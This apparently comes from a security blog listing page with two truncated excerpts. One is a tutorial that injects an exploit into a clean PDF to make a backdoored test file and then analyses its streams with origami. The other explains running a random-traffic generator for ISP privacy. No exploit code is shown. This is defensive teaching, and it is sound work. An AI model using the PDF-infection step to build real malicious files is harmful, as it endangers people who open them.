Evilblog

Recently i did a post on digital investigation of a backdoor PDF   in that post i defined PDF structure and how to analyse  these type of malicious files. In this post we will see another method of investigating these malicious file. We will separate all the attachments and Stream Objects from the malicious PDF file and then we will see if there is any malicious content like any listener IP address , dropper inside it. Creating the Malicious file STEP1. First i am gonna create an infected PDF for analysis , i won't create a listener as this is for tutorial purpose . I am gonna inject this exploit in a clean PDF file for this experiment as you can see below i am inserting the directory of the clean PDF file. And after running it i got the evil PDF Starting the Investigation We have created our file now it's time to investigate it. So clone in to this GitHub repository by typing git clone https://github.com/gdelugre/origami.git ...

What is this  In this post we will see how can we make our online activity less valuable from our ISP by generating random traffic.We will do this by generating random traffic which will random DNS and HTTP traffic in the background while you are visiting your regular web site and doing online activity . This will flood your online activity and your ISP won't get anything valuable that he can sell. How to do this  Doing this is very easy just follow some simple step as shown below  STEP 1. First open your terminal and clone in to this GitHub URL by typing git clone https://github.com/1tayH/noisy.git && cd noisy . STEP 2.  Now install dependencies by typing pip install request  STEP 3.  Now after installing dependencies just type python noisy.py --config config.json --timeout 50 . Here --config is for loading your configuration from config file , --timeout tell for how long you want it to run in second. ...